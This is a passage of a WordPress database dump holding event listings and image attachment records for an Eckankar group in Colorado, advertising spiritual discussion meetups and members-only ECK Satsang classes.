href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/281522860/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Pagosa Springs - In Person Meetup<br>\'Ancient Wisdom for Today\'<br>In-Person Book Discussion, Part Two','','publish','closed','closed','','631-234-428-384-972-305-878-589-556','','','2021-10-31 14:04:58','2021-10-31 20:04:58','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265861',0,'mec-events','',0),(265864,2,'2021-11-01 12:42:17','2021-11-01 18:42:17','<p><span style=\"font-size: 15pt;\"><strong>In the great cycle of birth, life and death, many people are uncertain about what happens after our physical existence ceases.</strong></span></p>\r\n<p><span style=\"font-size: 15pt;\"><strong>Is there really such a thing as life after death?<br />\r\n</strong><strong>Can we gain experience of this journey of Soul—while still living in the physical world?</strong></span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Understanding more about our true spiritual nature and our spiritual experiences can provide personal proof of Soul\'s eternal nature, and can answer questions as to what lies beyond this life.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Come explore the eternal, divine wonder of you!</span></p>\r\n<p><span style=\"font-size: 14pt;\">Join us for this spiritual discussion to share your own insights, learn from those of others, and try a spiritual exercise or two.</span></p>\r\n<p><span style=\"font-size: 14pt;\">This is the second of a 3-part discussion that digs deeper into the topic each time.  Join us even if you don’t attend the others. </span></p>\r\n<p><span style=\"font-size: 14pt;\"><strong>References:</strong></span><br />\r\n<span style=\"font-size: 14pt;\">\'<a href=\"https://www.amazon.com/Eck-Wisdom-Life-After-Death/dp/1570434387/ref=monarch_sidesheet\" target=\"_blank\" rel=\"noopener\"><em>ECK WISDOM on Life After Death</em></a>\', is a small booklet which will be referenced at the Meetup; it invites you to explore the internal nature of you!</span></p>\r\n<p><br />\r\n<a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofAurora/events/281774813/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup<br>‘Life after Death’ Discussion','','publish','closed','closed','','631-440-474','','','2021-11-03 11:50:35','2021-11-03 17:50:35','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265864',0,'mec-events','',0),(265869,2,'2021-11-03 10:02:07','2021-11-03 16:02:07','<p><strong><span style=\"font-size: 14pt;\">How do you tap into creativity?<br />\r\nHow does creativity relate to divinity?<br />\r\nHow does divine creativity help you live the life you want?</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\">All are warmly invited to join in this spiritual discussion. We will be using exercises to help you discover your own divine creativity. The evening will include contemplation and discussion on how to use the creative force moving through you to create the life you want to live. Our goal is that participants will recognize their own divine creativity and learn that they can create the life they want.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Harold Klemp says in his book, How to Survive Spiritually in Our Times, “You have the creative power within you. This is the godlike element within each Soul…Therefore each human being has the inborn ability to take charge of his or her own life...”</span></p>\r\n<p><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">To explore a deeper inner connection, check out <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">The Sound of Soul</a>.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">You can find the spiritual wisdom journal to accompany this meetup at <a class=\"link\" title=\"https://www.spiritualwisdomjournal.org/Archives/swj_july2015.pdf\" href=\"https://www.spiritualwisdomjournal.org/Archives/swj_july2015.pdf\" target=\"_blank\" rel=\"nofollow noopener ugc\">The Spiritual Wisdom Journal</a></span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/281820491/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup <br>\'12 Gifts of Spiritual Living: Creativity\'','','publish','closed','closed','','631-193','','','2021-11-03 14:56:07','2021-11-03 20:56:07','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265869',0,'mec-events','',0),(265870,2,'2021-11-03 10:00:41','2021-11-03 16:00:41','','flower-center-1','','inherit','closed','closed','','flower-center-1','','','2021-11-03 10:00:41','2021-11-03 16:00:41','',265869,'https://eckankar-colorado.org/wp-content/uploads/2021/11/flower-center-1.jpg',0,'attachment','image/jpeg',0),(265871,2,'2021-11-03 11:48:49','2021-11-03 17:48:49','<p><span style=\"font-size: 15pt;\"><strong>In the great cycle of birth, life and death, many people are uncertain about what happens after our physical existence ceases.</strong></span></p>\r\n<p><span style=\"font-size: 15pt;\"><strong>Is there really such a thing as life after death?<br />\r\n</strong><strong>Can we gain experience of this journey of Soul—while still living in the physical world?</strong></span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Understanding more about our true spiritual nature and our spiritual experiences can provide personal proof of Soul\'s eternal nature, and can answer questions as to what lies beyond this life.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Come explore the eternal, divine wonder of you!</span></p>\r\n<p><span style=\"font-size: 14pt;\">Join us for this spiritual discussion to share your own insights, learn from those of others, and try a spiritual exercise or two.</span></p>\r\n<p><span style=\"font-size: 14pt;\">This is the second of a 3-part discussion that digs deeper into the topic each time.  Join us even if you don’t attend the others. </span></p>\r\n<p><span style=\"font-size: 14pt;\"><strong>References:</strong></span><br />\r\n<span style=\"font-size: 14pt;\">\'<a href=\"https://www.amazon.com/Eck-Wisdom-Life-After-Death/dp/1570434387/ref=monarch_sidesheet\" target=\"_blank\" rel=\"noopener\"><em>ECK WISDOM on Life After Death</em></a>\', is a small booklet which will be referenced at the Meetup; it invites you to explore the internal nature of you!</span></p>\r\n<p><br />\r\n<a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofAurora/events/281774813/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup<br>‘Life after Death’ Discussion','','publish','closed','closed','','631-440-474-292','','','2021-11-09 11:07:40','2021-11-09 18:07:40','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265871',0,'mec-events','',0),(265872,2,'2021-11-03 11:48:16','2021-11-03 17:48:16','','black-white-connection-clean','','inherit','closed','closed','','black-white-connection-clean','','','2021-11-03 11:48:16','2021-11-03 17:48:16','',265871,'https://eckankar-colorado.org/wp-content/uploads/2021/11/black-white-connection-clean.jpg',0,'attachment','image/jpeg',0),(265874,2,'2021-11-03 15:06:51','2021-11-03 21:06:51','<p><strong><span style=\"font-size: 20pt;\">Do You Ever Wonder If There’s A Better Way To Meet The Ups And Downs Of Life?</span></strong></p>\r\n<p><strong><span style=\"font-size: 20pt;\">There Is!</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\">Join us to explore the divine imagination, the creative element within each of us. Your creative element is the God-spark within you. You can tap into your divine imagination to reveal better ways to handle troubling situations. This divine spark is your strength, solace, and sustenance in every troubling situation.</span><br />\r\n<br />\r\n<strong><span style=\"font-size: 14pt;\">Explore and discover these Secrets of Divine Creativity:</span></strong><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\"><strong>-</strong> Soul in its awakened state, is a natural survivor. All problems have answers. There may be a better way to handle them. Using our creative talents can help us solve our problems.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\"><strong>-</strong> Divine Spirit is always working on your behalf. As you go about your day, ideas may whisper to your mind on how to solve problems, and make your life more meaningful. Such ideas are nudges from Spirit. Watch for them.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\"><strong>-</strong> When things run too well our creativity falls asleep. The problems hit, and we’re jarred from our slumber. Yet, our God-sense tells us things don’t have to be arduous all the time. We can learn techniques to quickly slip into a creative mode.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Join us for a lively discussion where participants will explore and share experiences and insights on how to connect with divine creativity.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">You are also welcome to view or download an e-booklet on the topic at <a class=\"link\" title=\"https://www.eckankar.org/ebooklets/\" href=\"https://www.eckankar.org/ebooklets/\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECK Soul Adventure eBooklets</a>.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/Spiritual-Experiences-Group-of-Lakewood/events/281805225/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup<br>\'The Secrets of Divine Creativity:<br>All Problems Come with Answers\'','','publish','closed','closed','','631-210','','','2021-11-03 15:17:13','2021-11-03 21:17:13','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265874',0,'mec-events','',0),(265875,2,'2021-11-03 15:04:56','2021-11-03 21:04:56','','star-bridge','','inherit','closed','closed','','star-bridge','','','2021-11-03 15:04:56','2021-11-03 21:04:56','',265874,'https://eckankar-colorado.org/wp-content/uploads/2021/11/star-bridge.jpg',0,'attachment','image/jpeg',0),(265877,2,'2021-11-03 15:14:30','2021-11-03 21:14:30','<p><strong><span style=\"font-size: 20pt;\">Do You Ever Wonder If There’s A Better Way To Meet The Ups And Downs Of Life?</span></strong></p>\r\n<p><strong><span style=\"font-size: 20pt;\">There Is!</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\">Join us to explore the divine imagination, the creative element within each of us. Your creative element is the God-spark within you. You can tap into your divine imagination to reveal better ways to handle troubling situations. This divine spark is your strength, solace, and sustenance in every troubling situation.</span><br />\r\n<br />\r\n<strong><span style=\"font-size: 14pt;\">Explore and discover these Secrets of Divine Creativity:</span></strong><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\"><strong>-</strong> Soul in its awakened state, is a natural survivor. All problems have answers. There may be a better way to handle them. Using our creative talents can help us solve our problems.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\"><strong>-</strong> Divine Spirit is always working on your behalf. As you go about your day, ideas may whisper to your mind on how to solve problems, and make your life more meaningful. Such ideas are nudges from Spirit. Watch for them.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\"><strong>-</strong> When things run too well our creativity falls asleep. The problems hit, and we’re jarred from our slumber. Yet, our God-sense tells us things don’t have to be arduous all the time. We can learn techniques to quickly slip into a creative mode.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Join us for a lively discussion where participants will explore and share experiences and insights on how to connect with divine creativity.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">You are also welcome to view or download an e-booklet on the topic at <a class=\"link\" title=\"https://www.eckankar.org/ebooklets/\" href=\"https://www.eckankar.org/ebooklets/\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECK Soul Adventure eBooklets</a>.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/Spiritual-Experiences-Group-of-Lakewood/events/281829049/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup<br>\'The Secrets of Divine Creativity:<br>All Problems Come with Answers\'','','publish','closed','closed','','631-210-712','','','2021-11-03 15:18:12','2021-11-03 21:18:12','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265877',0,'mec-events','',0),(265881,0,'2021-11-06 07:11:34','2021-11-06 13:11:34','','','','publish','closed','closed','','265881','','','2021-11-06 07:11:34','2021-11-06 13:11:34','',0,'https://eckankar-colorado.org/nf_sub/265881/',0,'nf_sub','',0),(265888,0,'2021-11-07 03:18:04','2021-11-07 10:18:04','','','','publish','closed','closed','','265888','','','2021-11-07 03:18:04','2021-11-07 10:18:04','',0,'https://eckankar-colorado.org/nf_sub/265888/',0,'nf_sub','',0),(265889,0,'2021-11-07 08:44:54','2021-11-07 15:44:54','','','','publish','closed','closed','','265889','','','2021-11-07 08:44:54','2021-11-07 15:44:54','',0,'https://eckankar-colorado.org/nf_sub/265889/',0,'nf_sub','',0),(265891,0,'2021-11-07 09:08:58','2021-11-07 16:08:58','','','','publish','closed','closed','','265891','','','2021-11-07 09:08:58','2021-11-07 16:08:58','',0,'https://eckankar-colorado.org/nf_sub/265891/',0,'nf_sub','',0),(265892,0,'2021-11-07 10:25:59','2021-11-07 17:25:59','','','','publish','closed','closed','','265892','','','2021-11-07 10:25:59','2021-11-07 17:25:59','',0,'https://eckankar-colorado.org/nf_sub/265892/',0,'nf_sub','',0),(265893,0,'2021-11-07 10:28:28','2021-11-07 17:28:28','','','','publish','closed','closed','','265893','','','2021-11-07 10:28:28','2021-11-07 17:28:28','',0,'https://eckankar-colorado.org/nf_sub/265893/',0,'nf_sub','',0),(265894,0,'2021-11-07 10:31:07','2021-11-07 17:31:07','','','','publish','closed','closed','','265894','','','2021-11-07 10:31:07','2021-11-07 17:31:07','',0,'https://eckankar-colorado.org/nf_sub/265894/',0,'nf_sub','',0),(265895,0,'2021-11-07 10:48:34','2021-11-07 17:48:34','','','','publish','closed','closed','','265895','','','2021-11-07 10:48:34','2021-11-07 17:48:34','',0,'https://eckankar-colorado.org/nf_sub/265895/',0,'nf_sub','',0),(265899,0,'2021-11-07 19:35:00','2021-11-08 02:35:00','','','','publish','closed','closed','','265899','','','2021-11-07 19:35:00','2021-11-08 02:35:00','',0,'https://eckankar-colorado.org/nf_sub/265899/',0,'nf_sub','',0),(265900,2,'2021-11-09 11:00:34','2021-11-09 18:00:34','<p><span style=\"font-size: 18pt;\"><strong>New perspectives on seeing heaven before you die, meeting with departed loved ones, near-death experiences, getting help from spiritual guides, animals in heaven; and dealing with grief.</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">In the great cycle of birth, life and death, many people are uncertain about what happens after our physical existence ceases. Is there really such a thing as life after death? Can we gain experience of this journey of Soul—while still living in the physical world?</span></p>\r\n<p><span style=\"font-size: 14pt;\">Understanding more about our true spiritual nature and our spiritual experiences can provide personal proof of Soul\'s eternal nature, and can answer questions as to what lies beyond this life.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Come explore the eternal, divine wonder of you!</span></p>\r\n<p><span style=\"font-size: 14pt;\">Join us for this spiritual discussion to share your own insights, learn from those of others, and try a spiritual exercise or two. This is the third of a 3-part discussion that digs deeper into the topic each time. Join us even if you don’t attend the others.</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">Reference:</span></strong><br />\r\n<span style=\"font-size: 14pt;\">\'<em>ECK WISDOM on Life After Death</em>\', is a small booklet which will be referenced at the Meetup; it invites you to explore the internal nature of you!</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Get The Book or Ebook: </span><span style=\"font-size: 14pt;\"><a class=\"link\" title=\"https://www.amazon.com/Eck-Wisdom-Life-After-Death/dp/1570434387/ref=monarch_sidesheet\" href=\"https://www.amazon.com/Eck-Wisdom-Life-After-Death/dp/1570434387/ref=monarch_sidesheet\" target=\"_blank\" rel=\"noopener ugc\">Eck Wisdom on Life After Death</a></span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofAurora/events/281785768/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup<br>‘Life after Death’ Discussion','','publish','closed','closed','','631-669','','','2021-11-09 11:11:01','2021-11-09 18:11:01','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265900',0,'mec-events','',0),(265902,2,'2021-11-09 11:10:44','2021-11-09 18:10:44','','orange-path-walking-2','','inherit','closed','closed','','orange-path-walking-2','','','2021-11-09 11:10:44','2021-11-09 18:10:44','',265900,'https://eckankar-colorado.org/wp-content/uploads/2021/11/orange-path-walking-2.jpg',0,'attachment','image/jpeg',0),(265904,2,'2021-11-09 12:33:27','2021-11-09 19:33:27','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 18pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Temple Hybrid-Online & In Person ECK Satsang Class<br>\'The Eck Satsang Discourses Fourth Series\'','','publish','closed','closed','','satsang-class-the-master-2-discourses-848-617','','','2021-11-09 15:17:43','2021-11-09 22:17:43','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265904',0,'mec-events','',0),(265906,2,'2021-11-09 12:44:11','2021-11-09 19:44:11','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 18pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online ECK Satsang Class<br>\'The Easy Way Discourses\'','','publish','closed','closed','','satsang-class-the-master-2-discourses-848-163','','','2021-11-09 13:34:11','2021-11-09 20:34:11','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265906',0,'mec-events','',0),(265907,2,'2021-11-09 12:55:51','2021-11-09 19:55:51','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 18pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Temple Hybrid-Online & In Person ECK Satsang Class<br>\'The Eck Dream 1 Discourses \'','','publish','closed','closed','','satsang-class-the-master-2-discourses-848-617-540','','','2021-11-09 14:24:41','2021-11-09 21:24:41','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265907',0,'mec-events','',0),(265908,2,'2021-11-09 13:13:12','2021-11-09 20:13:12','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 18pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online ECK Satsang Class<br>\'The Eck Dream 2 Discourses\'','','publish','closed','closed','','satsang-class-the-master-2-discourses-848-802','','','2021-11-09 13:13:12','2021-11-09 20:13:12','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265908',0,'mec-events','',0),(265909,2,'2021-11-09 13:21:35','2021-11-09 20:21:35','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 18pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Florence Hybrid-Online & In Person ECK Satsang Class<br>\'Letters Of Light And Sound 2\'','','publish','closed','closed','','satsang-class-the-master-2-discourses-848-617-151','','','2021-11-09 13:30:53','2021-11-09 20:30:53','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265909',0,'mec-events','',0),(265910,2,'2021-11-09 13:28:27','2021-11-09 20:28:27','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 18pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online ECK Satsang Class<br>\'Soul Travel 1 - The Illuminated Way\'','','publish','closed','closed','','satsang-class-the-master-2-discourses-848-884','','','2021-11-09 13:28:27','2021-11-09 20:28:27','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265910',0,'mec-events','',0),(265911,2,'2021-11-09 14:31:15','2021-11-09 21:31:15','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 18pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online ECK Satsang Class<br>\'Soul Travel 2\'','','publish','closed','closed','','satsang-class-the-master-2-discourses-848-462','','','2021-11-09 14:31:15','2021-11-09 21:31:15','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265911',0,'mec-events','',0),(265913,2,'2021-11-09 14:42:29','2021-11-09 21:42:29','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 18pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Temple Hybrid-Online & In Person ECK Satsang Class<br>\'The Secret Way \'','','publish','closed','closed','','satsang-class-the-master-2-discourses-848-617-366','','','2021-11-09 14:42:29','2021-11-09 21:42:29','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265913',0,'mec-events','',0),(265915,2,'2021-11-09 14:50:37','2021-11-09 21:50:37','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 18pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online ECK Satsang Class<br>\'The Precepts Of Eckankar\'','','publish','closed','closed','','online-eck-satsang-classthe-precepts-of-eckankar','','','2021-11-09 14:50:37','2021-11-09 21:50:37','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265915',0,'mec-events','',0),(265917,2,'2021-11-09 15:03:14','2021-11-09 22:03:14','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 18pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online ECK Satsang Class<br>\'The Eck Satsang Discourses - Third Series\'','','publish','closed','closed','','108','','','2021-11-09 15:03:48','2021-11-09 22:03:48','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265917',0,'mec-events','',0),(265918,2,'2021-11-09 16:29:30','2021-11-09 23:29:30','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 18pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve 